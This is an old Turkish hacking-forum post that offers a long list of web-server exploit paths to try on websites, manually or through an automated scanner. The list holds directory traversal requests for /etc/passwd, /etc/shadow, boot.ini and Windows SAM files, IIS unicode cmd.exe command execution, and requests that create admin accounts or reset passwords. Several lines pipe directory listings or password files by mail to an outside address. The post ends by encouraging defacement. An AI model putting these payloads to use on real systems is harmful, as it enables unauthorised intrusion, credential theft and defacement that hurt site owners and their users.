Site Açıkları (Belki İşinize Yarar)

Tahribat.com Forumları
line

Virüs - Trojan - Keylogger - BotNet
line

Site Açıkları (Belki İşinize Yarar)

18/Kas/05 16:22 Kısayol Şikayet Özel Mesaj

erdal

Kayıt Tarihi: 01/Ekim/2005

Bu açıkları ister elle teker teker deneyip ister de yazacağınız bir script veya programa ekleyerek otomatik olarak tarama yapabilirsiniz.
/./
/..
/../..
/..../
/....../
/....../
/......../
/~
/+/
/+./
/++/
/++./
/%00/
:2301
/2600-cgi/ezmlm-cgi
/%2E%2E
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts
/%2E%2E/%2E%2E/Program%20Files/AnalogX/SimpleServer/www/server.log
:3000/../../hosts
:3128/../../../../
:3128/../../../conf/Eserv.ini
:444/..........autoexec.bat
:5000/
:800/../..
:8000/cgi/wja?page=wja
:8000/servlet/com.livesoftware.jrun.plugins.jsp.JSP/../../../tst.txt
:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../test.jsp
:8000/servlet/jsp/../../tst.txt
:8000/servlet/ssifilter/../../test.jsp
:8002/Newuser?Image=../../database/rbsserv.mdb
:8003/Display
:800/C:/
:8010/
:8010//
:8010/..../
:8010/c://
:8010/d://
:8010/Guide/../../../../../../../../../../../../../../../etc/shadow
:8010/Guide/../../../../../../../../../../../var/CommuniGate/Accounts/postmaster.macnt/account.settings
:801/../../../../../../../../etc/hosts
:8080/anything.jsp
:8080/../../../conf/Eserv.ini
:8080/examples/jsp/snp/anything.snp
:8080/tea/dynamic/system/teaservlet/Admin?admin=true
:8088
:80/../../../autoexec.bat
:8100//WEB-INF/
:8100//WEB-INF/webapp.properties
:8100//WEB-INF/web.xml
:8383
:8888/
:8888/ab2/@Ab2Admin
:8888/cgi-bin/admin/admin
:8888/cgi-bin/admin/admin?command=add_user&uid=percebe&password=percebe&re_password=percebe
:8987/sawmill?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3
:9000/cgi-bin/query%3f
:901
:9090
:9090/board.html
:9090/examples/applications/bboard/bboard_frames.html
:9090/servlet/com.sun.server.http.pagecompile.jsp92.JspServlet/board.html
:9998/
/.access
/achg.htr
/active.log
/ad.cgi?file=../../../../../../../../etc/hosts
/admin/
/admin.cgi
/Admin_files/order.log
/admin.htm
/admin.html
/admin/includes/
/admin.php3
/admin.php3?admin=whatever
/admin.pl
/admin-serv/config/admpw
/admin.shtml
/admisapi/fpadmin.htm
/ads/admin.cgi
/ads/adpassword.txt
/adsamples/config/site.csc
/AdvWorks/equipment/catalog_type.asp
/advworks/equipment/catalog_type.asp
/aexp2.htr
/aexp3.htr
/aexp4b.htr
/aglimpse
/Album/?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0
/aliredir.exe
/....../ all
/../../../../ all
/amadmin.pl
/AnalogX
/anot3.htr
/AnyForm2
/anything.jsp
/architext_query.pl
/args.bat
/ASPSamp/AdvWorks/equipment/catalog_type.asp
/AT-admin.cgi
/auctionweaver.pl
/_AuthChangeUrl
/_AuthChangeUrl?
/authors.pwd
/....../autoexec.bat
/........./autoexec.bat
/......autoexec.bat
/aux
/bash
/.bash_history
/bb-dnbd/bb-hist.sh
/bboard_frames.html
/beaninfo.cfm
/bigconf.cgi
/~bin
/~bin/
/bin
/bin/
/bin/common/user_update_admin.pl
/bin/common/user_update_passwd.pl?user_id=V&firstname=FI&lastname=LA&course_id=SID&password1=NEWPWD&password2=NEWPWD
/bizdb1-search.cgi
/blabla.ida
/blabla.idc
/blabla.idq
/blabla.idw
/bnbform
/bnbform.cgi
/../../../../../../../boot.ini
/../../boot.ini
/build.cgi
/campas
/carbo.dll
/cart32.exe
/cart.cgi
/catalog.nsf
/catalog.nsf/
/ccbill/
/ccbill/secure/ccbill.log
/cd/../config/html/cnf_gi.htm
/cfappman/index.cfm
/cfdocs/cfmlsyntaxcheck.cfm
/cfdocs/exampleapp/docs/sourcewindow.cfm
/cfdocs/exampleapp/docs/sourcewindow.cfm?Template=
/cfdocs/exampleapp/email/application.cfm
/cfdocs/exampleapp/email/getfile.cfm
/cfdocs/exampleapp/email/getfile.cfm?filename=c:oot.ini
/cfdocs/exampleapp/email/getfile.cfm?filename=c:oot.ini
/cfdocs/exampleapp/publish/admin/addcontent.cfm
/cfdocs/exampleapp/publish/admin/addcontent.cfm
/cfdocs/exampleapp/publish/admin/application.cfm
/cfdocs/examples/cvbeans/beaninfo.cfm
/cfdocs/examples/CVLibrary/GetFile.CFM?FT=Text&FST=Plain&FilePath=C:oot.ini
/cfdocs/examples/httpclient/mainframeset.cfm
/cfdocs/examples/parks/detail.cfm
/cfdocs/expelval/displayopenedfile.cfm
/cfdocs/expelval/exprcalc.cfm
/cfdocs/expelval/openfile.cfm
/cfdocs/expelval/sendmail.cfm
/cfdocs/expelvel/openfile.cfm
/cfdocs/expeval/displayopenedfile.cfm
/cfdocs/expeval/eval.cfm
/cfdocs/expeval/exprcalc.cfm
/cfdocs/expeval/openfile.cfm
/cfdocs/expeval/sendmail.cfm
/cfdocs/expressions.cfm
/cfdocs/MOLE.CFM
/cfdocs/root.cfm
/cfdocs/snippets/evaluate.cfm
/cfdocs/snippets/fileexist.cfm
/cfdocs/snippets/fileexists.cfm
/cfdocs/snippets/gettempdirectory.cfm
/cfdocs/snippets/setlocale.cfm
/cfdocs/snippets/viewexample.cfm
/cfdocs/snippets/viewexample.cfm?Tagname=
/cfdocs/TOXIC.CFM
/cfdocs/zero.cfm
/CFIDE/Administrator/startstop.html
/cfide/Administrator/startstop.html
/cfmlsyntaxcheck.cfm
/cfusion/cfapps/forums/data/forums.mdb
/cfusion/cfapps/forums/forums_.mdb
/cfusion/cfapps/security/data/realm.mdb
/cfusion/cfapps/security/realm_.mdb
/cfusion/database/cfexamples.mdb
/cfusion/database/cfsnippets.mdb
/cfusion/database/cypress.mdb
/cfusion/database/smpolicy.mdb
/cgi
/cgi/
/cgi-bin
/cgi-bin/
/cgibin
/cgibin/
/cgi-bin/abuse.man?file=&domain=&script=
/cgi-bin/ad.cgi?file=../../../../../../../../etc/hosts
/cgi-bin/add_ftp.cgi
/cgi-bin/admin.cgi
/cgi-bin/Admin_files/order.log
/cgi-bin/adp
/cgi-bin/adpassword.txt
/cgi-bin/ads.cgi
/cgi-bin/ads.setup
/cgi-bin/af.cgi
/cgi-bin/aglimpse
/cgi-bin/alibaba.pl
/cgi-bin/alibaba.pl|dir
/cgi-bin/alibaba.pl|dir
/cgi-bin/aliredir.exe
/cgi-bin/allmanage/adp
/cgi-bin/allmanage.cgi
/cgi-bin/allmanage/k
/cgi-bin/allmanage.pl
/cgi-bin/allmanage/settings.cfg
/cgi-bin/allmanageup.pl
/cgi-bin/allmanage/userfile.dat
/cgibin/amadmin.pl?setpasswd
/cgi-bin/AnyBoard.cgi
/cgi-bin/anyboard.cgi
/cgi-bin/AnyForm
/cgi-bin/AnyForm2
/cgi-bin/archie
/cgi-bin/architext_query.cgi
/cgi-bin/architext_query.pl
/cgi-bin/ash
/cgi-bin/AT-admin.cgi
/cgi-bin/AT-generate.cgi
/cgi-bin/authorize/dbmfiles/users
/cgi-bin/awl/auctionweaver.pl
/cgi-bin/awl/auctionweaver.pl?flag1=1&catdir=................&fromfile=Boot.ini
/cgi-bin/ax-admin.cgi
/cgi-bin/ax.cgi
/cgi-bin/axs.cgi
/cgi-bin/bash
/cgi-bin/bb-ack.sh
/cgi-bin/bb-dnbd
/cgi-bin/bb-histlog.sh
/cgi-bin/bb-hist.sh
/cgi-bin/bb-hist.sh?HISTFILE=../../../../../../etc/hosts
/cgi-bin/bb-hist.sh?HISTFILE=/home/*
/cgi-bin/bb-hostsvc.sh
/cgi-bin/bb-hostsvc.sh?HOSTSVC=/../../../../../../../../etc/hosts
/cgi-bin/bb-replog.sh
/cgi-bin/bb-rep.sh
/cgi-bin/bigconf.cgi
/cgi-bin/bigconf.cgi all
/cgi-bin/bizdb1-search.cgi
/cgi-bin/bizdb1-search.cgi?template=bizdb-summary&dbname=;ls|mail%20riotnation@hotmail.com|&f6=^a.*&action=searchdbdisplay
/cgi-bin/blabla?%0a/bin/cat%20/etc/passwd
/cgi-bin/bnbform
/cgi-bin/bnbform.cgi
/cgi-bin/bnbform.pl
/cgi-bin/build.cgi
/cgi-bin/cached_feed.cgi?../../../.+/etc/hosts
/cgi-bin/cachemgr.cgi
/cgi-bin/calendar
/cgi-bin/calender_admin.pl
/cgi-bin/calender.pl
/cgi-bin/campas
/cgi-bin/campas?%0acat%0a/etc/passwd%0a
/cgi-bin/carbo.dll
/cgi-bin/cart32.exe/expdate
/cgi-bin/cart.pl
/cgi-bin/cat
/cgi-bin/cgiemail/uargg.txt
/cgi-bin/cgiforum.cgi?thesection=../../../../../../etc/hosts%00
/cgi-bin/cgiforum.pl?thesection=../../../../../../etc/hosts%00
/cgi-bin/cgi-lib.pl
/cgi-bin/CGImail.exe
/cgi-bin/cgimail.exe
/cgi-bin/Cgitest.exe
/cgi-bin/cgitest.exe
/cgi-bin/cgiwrap
/cgi-bin/cgiwrap
/cgi-bin/classified.cgi
/cgi-bin/classifieds
/cgi-bin/classifieds.cgi
/cgi-bin/clickresponder.pl
/cgi-bin/cmd.exe
/cgi-bin/.cobalt/siteUserMod.cgi
/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi
/cgi-bin/commander.pl
/cgi-bin/cookmail
/cgi-bin/cookmail/cookmail
/cgi-bin/cookmail/cookmail.exe
/cgi-bin/core
/cgi-bin/Count.cgi
/cgi-bin/count.cgi
/cgi-bin/counterbanner
/cgi-bin/counterbanner-ord
/cgi-bin/counterfiglet
/cgi-bin/counterfiglet/nc/f=;echo;w;uname%20-a;id
/cgi-bin/counterfiglet-ord
/cgi-bin/counter-ord
/cgi-bin/cpmdaemon.cgi
/cgi-bin/csh
/cgi-bin/cvsweb.cgi
/cgi-bin/data/nicks
/cgi-bin/date
/cgi-bin/day5datacopier.cgi
/cgi-bin/day5datanotifier.cgi
/cgi-bin/day5notifier
/cgi-bin/db2www/library/document.d2w/report?uid=UNKNOWN&pwd=&search_type=SIMPLE&r_host=&last_page=db2www0022.html&fn=db2www.html
/cgi-bin/dbman/db.cgi
/cgi-bin/dbmlparser.exe
/cgi-bin/dcforum/install_help.cgi
/cgi-bin/dcguest.cgi
/cgi-bin/dcguest/dcguest.cgi
/cgi-bin/dfire.cgi
/cgi-bin/dig.cgi
/cgi-bin/disk2server.cgi
/cgi-bin/dnewsweb
/cgi-bin/donothing
/cgi-bin/download.cgi
/cgi-bin/dumpenv
/cgi-bin/dumpenv.pl
/cgi-bin/echo
/cgi-bin/echo.bat
/cgi-bin/edit.pl
/cgi-bin/edit.pl
/cgi-bin/environ.cgi
/cgi-bin/environ.pl
/cgi-bin/everythingform.cgi?config=../../../../../../../../bin/ping&Name=xx&e-mail=riotnation@hotmail.com
/cgi-bin/ews
/cgi-bin/excite
/cgi-bin/ezmlm-cgi
/cgi-bin/faxsurvey
/cgi-bin/faxsurvey?/bin/ls%20-a
/cgi-bin/.fhp
/cgi-bin/fi
/cgi-bin/fi?/etc/passwd
/cgi-bin/filemail
/cgi-bin/filemail.cgi
/cgi-bin/filemail.pl
/cgi-bin/files.pl
/cgi-bin/finger
/cgi-bin/finger.cgi
/cgi-bin/finger.cgi?action=archives&cmd=specific&&filename=99.10.28.15.23.username.|/bin/ls|
/cgi-bin/finger?@localhost
/cgi-bin/finger.pl
/cgi-bin/finger?tiedotus@uta.fi%3B%2Fbin%2Fmail+riotnation@hotmail.com+%3C+etc%2Fpasswd
/cgi-bin/flexform
/cgi-bin/flexform.cgi
/cgi-bin/foo.cmd?xxx&dir
/cgi-bin/FormHandler.cgi
/cgi-bin/formhandler.cgi
/cgi-bin/FormMail.pl
/cgi-bin/formmail.pl
/cgi-bin/formprocessor.asp?MailTo=riotnation@hotmail.com&MailFrom=tst@no.net&Message=tst&MailTemplate1=/cgi-bin/formprocessor.asp
/cgi-bin/formto.pl
/cgi-bin/fortune
/cgi-bin/forum-admin.pl
/cgi-bin/forumdisplay.cgi
/cgi-bin/forum.pl
/cgi-bin/fpcount.exe
/cgi-bin/fpexplore.exe
/cgi-bin/fpexplorer.exe
/cgi-bin/ftpdiag.cgi
/cgi-bin/ftp/ftp.pl?dir=../../../../../../etc
/cgi-bin/futureforum.cgi
/cgi-bin/gbook.cgi?_MAILTO=xx;ls
/cgi-bin/get16.exe
/cgi-bin/get32.exe
/cgi-bin/get32.exe|dir
/cgi-bin/getdoc.cgi
/cgi-bin/gH.cgi
/cgi-bin/glimpse
/cgi-bin/guestadd.pl
/cgi-bin/guestbook.cgi
/cgi-bin/guestbook.pl
/cgi-bin/GW5
/cgi-bin/GW5/GWWEB.EXE
/cgi-bin/GW5/GWWEB.EXE?HELP=bad-request
/cgi-bin/GW5/GWWEB.EXE?HELP=../../../../../index
/cgi-bin/GWWEB.EXE
/cgi-bin/handler
/cgi-bin/handler.cgi
/cgi-bin/hello.bat
/cgibin/htgrep/file=index.html&hdr=/etc/hosts
/cgi-bin/htimage.exe
/cgi-bin/htmldocs
/cgi-bin/html_page?TEMPLATE=main
/cgi-bin/htmlscript
/cgi-bin/htmlscript?../../../../../../etc/passwd
/cgi-bin/htsearch
/cgi-bin/htsearch?exclude=%60%60
/cgi-bin/icat
/cgi-bin/iisadmpwd/achg.htr
/cgi-bin/iisadmpwd/aexp2.htr
/cgi-bin/iisadmpwd/aexp.htr
/cgi-bin/iisadmpwd/anot.htr
/cgi-bin/imagemap
/cgi-bin/imagemap.c
/cgi-bin/imagemap.exe
/cgi-bin/imapcern.exe
/cgi-bin/imapncsa.exe
/cgi-bin/info2html
/cgi-bin/info2www
/cgi-bin/info2www?(../../../../../../../bin/mail riotnation@hotmail.com+c:InetPubwwwrootcmd.pl+&+.pl
/perl.exe
/perl/files.pl
/perlshop.cgi
/pfdisplay.cgi
/phf
/photoads/
/photoads/cgi-bin/
/photoads/cgi-bin/env.cgi
/.photon/voyager/config.full
/php.cgi
/phpgroupware/inc/phpgwapi/phpgw.inc.php
/phpPhotoAlbum/getalbum.php?album=../../../etc/
/ping all
/ping?SomeCrapHere
/piranha/secure/passwd.php3
/piranha/secure/passwd.php3?username=piranha&passwd=q
/pollit
/Poll_It_SSI_v2.0.cgi
/Poll_It_v2.0.cgi
/post16.exe
/ppwb/Temp/
/ppwd
/prd.i/pgen/
/printenv
/_private
/_private/form_results.htm
/_private/form_results.txt
/_private/orders.htm
/_private/orders.txt
/_private/orders.txt
/_private/register.htm
/_private/register.txt
/_private/register.txt
/_private/registrations.htm
/_private/registrations.txt
/_private/shopping_cart.mdb
/products/phpPhotoAlbum/explorer.php?folder=../../../../../../../etc/
/pservlet.html
/PSUser/PSCOErrPage.htm
/publisher/
/pw/storemgr.pw
/quikstore.cfg
/random_banner/index.cgi?image_list=alternative_image.list&html_file=../../../../../etc/hosts
/random_banner/index.cgi?image_list=alternative_image.list&html_file=|ls%20-la|
/redir.cgi
/redirect.cgi
/redirect.pl
/redir.pl
/repost.asp
/rguest.exe
/robots.txt
/~root
/~root/
/root/
/rpm_query
/rsh
/rwwwshell.pl
/s97_cgi.exe
/s_97.vts
/sam._
/samples/
/samples/search/queryhit.htm
/~sbin/
/script/
/scripts
/scripts/
/scripts/alibaba.pl|dir
/scripts/args.bat
/scripts/args.cmd
/scripts/awl/auctionweaver.pl
/scripts/bdir.htr
/scripts/bigconf.cgi
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:
/scripts/c32web.exe/ChangeAdminPassword
/scripts/Carello/add.exe
/scripts/cart32.exe/cart32clientlist
/scripts/cart32.exe/cart32clientlist?passwd=wemilo
/scripts/CGImail.exe
/scripts/cgimail.exe
/scripts/Cgitest.exe
/scripts/../../cmd.exe
/scripts/cmd.exe
/scripts/../../cmd.exe?%2FC+echo+"hacked!">c:hello.bat
/scripts/convert.bas
/scripts/counter.exe
/scripts/cpshost.dll
/scripts/..%d0%af../winnt/system32/cmd.exe?/c+dir+c:
/scripts/..%d1%9c../winnt/system32/cmd.exe?/c+dir+c:
/scripts/dbman/db.cgi?db=invalid-db
/scripts/dbman/db.cgi?db=tedb
/scripts/dbmlparser.exe
/scripts/emurl/RECMAN.dll
/scripts/emurl/RECMAN.dll?
/scripts/excite
/scripts/files.pl
/scripts/foo.cmd?xxx&dir
/scripts/Fpadmcgi.exe
/scripts/fpcount.exe
/scripts/fpexplorer.exe
/scripts/get32.exe|dir
/scripts/GW5/GWWEB.EXE
/scripts/htimage.exe
/scripts/iisadmin/bdir.htr
/scripts/iisadmin/bdir.htr?dir=ht??c:
/scripts/iisadmin/default.htm
/scripts/iisadmin/ism.dll
/scripts/iisadmin/ism.dll%3fhttp/dir
/scripts/iisadmin/ism.dll?http/dir
/scripts/iisadmin/ism.dll?http/dir%20..../
/scripts/iisadmin/samples/ctgestb.htx
/scripts/iisadmin/samples/ctgestb.idc
/scripts/iisadmin/samples/details.htx
/scripts/iisadmin/samples/details.idc
/scripts/iisadmin/samples/query.htx
/scripts/iisadmin/samples/query.idc
/scripts/iisadmin/samples/register.htx
/scripts/iisadmin/samples/register.idc
/scripts/iisadmin/samples/sample2.htx
/scripts/iisadmin/samples/sample.htx
/scripts/iisadmin/samples/sample.idc
/scripts/iisadmin/samples/viewbook.htx
/scripts/iisadmin/samples/viewbook.idc
/scripts/iisadmin/tools/ct.htx
/scripts/iisadmin/tools/ctss.idc
/scripts/iisadmin/tools/dsnform.exe
/scripts/iisadmin/tools/getdrvrs.exe
/scripts/iisadmin/tools/mkilog.exe
/scripts/iisadmin/tools/newdsn.exe
/scripts/imagemap.exe
/scripts/input2.bat
/scripts/input.bat
/scripts/issadmin/bdir.htr
/scripts/mlog.html
/scripts/mylog.html
/scripts/no-such-file.pl
/scripts/perl
/scripts/perl?
/scripts/perl.exe
/scripts/pfieffer.bat
/scripts/pfieffer.cmd
/scripts/phpmlog.phtml
/scripts/phpmylog.phtml
/scripts/plusmail
/scripts/postinfo.asp
/scripts/process_bug.cgi
/scripts/proxy/w3proxy.dll
/scripts/pu3.pl
/scripts/query?mss=../config
/scripts/repost.asp
/scripts/repost.asp
/scripts/rguest.exe
/scripts/run.exe
/scripts/samples/ctguestb.idc
/scripts/samples/details.idc
/scripts/samples/search/author.idq
/scripts/samples/search/filesize.idq
/scripts/samples/search/filetime.idq
/scripts/samples/search/queryhit.idq
/scripts/samples/search/queryhit.idq?CiRestriction=%23FILENAME%3D*.pwd&CiMaxRecordsPerPage=10&CiScope=%2F&TemplateName=queryhit&CiSort=rank%5Bd%5D&HTMLQueryForm=%2Fsamples%2Fsearch%2Fqueryhit.htm
/scripts/samples/search/queryhit.idq?CiRestriction=%23FILENAME%3D*.pwl&CiMaxRecordsPerPage=10&CiScope=%2F&TemplateName=queryhit&CiSort=rank%5Bd%5D&HTMLQueryForm=%2Fsamples%2Fsearch%2Fqueryhit.htm
/scripts/samples/search/simple.idq
/scripts/samples/search/webhits.exe
/scripts/script.bat%3f&dir
/scripts/script.cmd%3f&dir
/scripts/scriptssnorkerz.bat
/scripts/scriptssnorkerz.cmd
/scripts/search.cgi?letter=........winnt
/scripts/slxweb.dll
/scripts/slxweb.dll/admin
/scripts/test.bat
/scripts/test.exe
/scripts/tools/dsnform.exe
/scripts/tools/getdrvrs.exe
/scripts/tools/getdrvs.exe
/scripts/tools/mkilog.exe
/scripts/tools/newdsn.exe
/scripts/tools/newdsn.exe%3fdriver=Microsoft%2BAccess%2BDriver%2B%28*.mdb%29&dsn=Web%20SQL&dbq=c:web.mdb&newdb=CREATE_DB&attr=
/scripts/tst.bat|dir
/scripts/upload.asp
/scripts/upload.asp
/scripts/uploader.exe
/scripts/uploadn.asp
/scripts/uploadx.asp
/scripts/visadmin.exe
/scripts/wa.exe
/scripts/webbbs.exe
/scripts/wguest.exe
/scripts/win-c-sample.exe
/scripts/wsisa.dll
/scripts/wsisa.dll/WService=anything?WSMadmin
/search
/search%3f
/search97/s97_cgi.exe
/search97/search97.vts
/search97.vts
/search.dll
/search.dll?search?query=%00&logic=AND
/search/iaquery.exe%3f
/secret/index.htm
/secret/index.html
/secure/.htaccess
/secure/.wwwacl
/server%20logfile
/server-status
/service.pwd
/servlet/
/servlet/file
/servlet/SessionServlet
/servlet/test/pathInfo/test
/servlet/viewsource.jsp
/session/adminlogin
/session/adminlogin?RCpage=/sysadmin/index.stm
/session/admnlogin
/shopper.conf
/shop.pl
/showcode.asp
/showfile.asp
/*.shtml/
/shtml.exe
/site.csc
/site/eg/source.asp
/siteman000510/siteman.php3
/smdata.dat
/SPSamp/AdvWorks/equipment/catalog_type.asp
/srchadm
/ss.cfg
/ssi/envout.bat
/startstop.html?.cfm
/stat/
/stats/
/status
/store/
/submit.php
/subscribe.pl
/suche%3f
/survey
/survey.cgi
/tcsh
/~test
/test
/test%2ejsp
/test.bat
/test-cgi
/test.jsp..
/test.jsp../
/test.php3
/textcounter.pl
/~tmp
/~tmp/
/today.nsf
/today.nsf/
/tools/newdsn.exe?driver=Microsoft%2BAccess%2BDriver%2B%28*.mdb%29&dsn=goatfart+samples+from+microsoft&dbq=..%2F..%2Fwwwroot%2goatfart.html&newdb=CREATE_DB&attr=
/tree.dat
/tst.bat
/ubb/cgi-bin/postings.cgi
/unlg1.1
/update/
/update.cgi
/update.pl
/upload/
/uploader.exe
/uploadx.asp
/~usr/
/usr/local/apache/share/htdocs/.htaccess
/usr/local/apache/share/htdocs/.htaccess
/usr/openwin/bin/kcms_configure
/~uucp/
/~var/
/viewcode.asp
/view-source
/viewsource.jsp
/visadmin.exe
/_vti_bin
/_vti_bin/fpcount.exe
/_vti_bin/shtml.dll
/_vti_bin/shtml.dll/tstt.htm
/_vti_bin/shtml.exe
/_vti_bin/_vti_adm
/_vti_bin/_vti_adm/admin.dll
/_vti_bin/_vti_aut
/_vti_bin/_vti_aut/author.dll
/_vti_bin/_vti_aut/dvwssr.dll
/_vti_bin/_vti_aut/mtd2lv.dll
/__vti_inf.html
/_vti_inf.html
/_vti_log/author.log
/_vti_pvt
/_vti_pvt/access.cnf
/_vti_pvt/administrator.pwd
/_vti_pvt/administrators.pwd
/_vti_pvt/admin.pwd
/_vti_pvt/author.log
/_vti_pvt/authors.pwd
/_vti_pvt/authors.pwd
/_vti_pvt/service.cnf
/_vti_pvt/service.grp
/_vti_pvt/service.pwd
/_vti_pvt/service.pwd
/_vti_pvt/services.cnf
/_vti_pvt/service.stp
/_vti_pvt/shtml.dll
/_vti_pvt/shtml.exe
/_vti_pvt/svcacl.cnf
/_vti_pvt/users.pwd
/_vti_pvt/writeto.cnf
/_vti_pwd/administrators.pwd
/w3proxy.dll
/webcart/
/webcart-lite/
/webdist.cgi
/webfind.exe
/webgais
/webplus
/websendmail
/WebShop/logs/cc.txt
/WebShop/logs/ck.log
/WebShop/templates/cc.txt
/WebSTAR
/Web_Store
/wguest.exe
/WhatsNew/
/whois.cgi
/win-c-sample.exe
/windmail.exe
/..../Windows/Admin.pwl
/winnt
/."./."./winnt/reapir/sam._%20.pl
/../../../../../winnt/repair/sam._
/......winnt
epairsam._
/wrap
/WS_FTP.INI
/WS_FTP.ini
/ws_ftp.ini
/www
/.wwwacl
/wwwboard
/wwwboard.pl
/wwwboard/wwwadmin.cgi
/wwwboard/wwwadmin.pl
/wwwboard/wwwboard.pl
/.www.my.cnf
/www-sql
/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
bu tür acıkların cıkma olasılığı %1 ama yinede deneyin
--------------------------------------------------------------------------------
bunları scanner programlarıyla taratıp ulaşabilirsinizi
--------------------------------------------------------------------------------
N-Steath programıyla bu açıklara göz atabilirsiniz. Ama bu açıklarla güncel sitelere hiçbirşey yapamazsınız. Script Deface'lerin önemi arttı. Artık bir scripting dili öğrenip kendinizde siteyi hata yapmaya zorlayabilirsiniz. En iyi örneğide Php-Nuke siteleridir.
--------------------------------------------------------------------------------

Alıntı yap

Toplam Hit: 10115 Toplam Mesaj: 1

Cevapla